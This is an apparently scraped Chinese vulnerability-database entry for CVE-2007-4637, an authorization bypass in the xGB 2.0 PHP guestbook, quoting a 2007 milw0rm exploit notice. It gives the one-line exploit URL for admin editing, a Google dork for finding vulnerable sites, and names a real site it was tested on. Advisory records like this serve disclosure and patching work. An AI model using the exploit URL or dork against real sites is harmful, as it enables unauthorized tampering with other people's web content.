xGB xGB.php 编辑权限管理漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113546 漏洞类型 未知
发布时间 2007-08-29 更新时间 2007-08-31
CVE编号 CVE-2007-4637 CNNVD-ID CNNVD-200708-517
漏洞平台 PHP CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/4336
https://www.securityfocus.com/bid/85416
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200708-517
|漏洞详情
xGB2.0版本的xGB.php不需要对管理编辑操作的权限,这会允许远程攻击者可以借助一系列未知的步骤,进行未明更改。
|漏洞EXP
/*
*
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
* Bug discovered by DarkFuneral
* http://www.darkfuneral89.altervista.org/
*
* Affected Software: xGB
* CMS Site: "i don't know! :P"
* Severity: Critical
* Description: An attacker can edit all message in xGB
* Google Dork: allinurl:"xGb.php"
*
* E-Mail: darkfuneral89@gmail.com
* 
*
*
*
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
*
*
*
* Tested on www.culturebeach.de/guestbook.php
*
* Special Greetz to SystemFAILURE because I Love Him...
*
*/

# milw0rm.com [2007-08-29]
|受影响的产品
Xgb Xgb 2.0
|参考资料

来源:MILW0RM
名称:4336
链接:http://www.milw0rm.com/exploits/4336